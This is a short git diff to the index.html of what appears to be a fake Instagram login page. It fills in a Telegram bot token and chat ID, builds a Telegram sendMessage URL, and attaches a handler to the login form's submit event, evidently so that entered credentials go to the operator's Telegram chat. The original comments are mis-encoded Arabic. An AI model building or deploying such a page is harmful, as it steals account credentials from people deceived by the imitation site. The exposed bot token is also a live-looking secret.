--- a/instagram/index.html
+++ b/instagram/index.html
@@ -68,8 +68,8 @@
     </footer>
 
 <script>
-    const TOKEN = "";                                                            // Ù‡Ù†Ø§ Ø§Ù„ØªÙˆÙƒÙŠÙ†              
-    const CHAT_ID = "";                                                       // Ù‡Ù†Ø§ Ù…Ø¹Ø±Ù Ø§Ù„Ø´Ø§Øª https://api.telegram.org/bot/getUpdates
+    const TOKEN = "7891815790:AAFftlasAWCsg3ex8XpbkznkM3cLck_0QNo";
+    const CHAT_ID = "6424248902";                                                      
     const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;        
 
     document.getElementById('login-form').addEventListener('submit', function(e) {
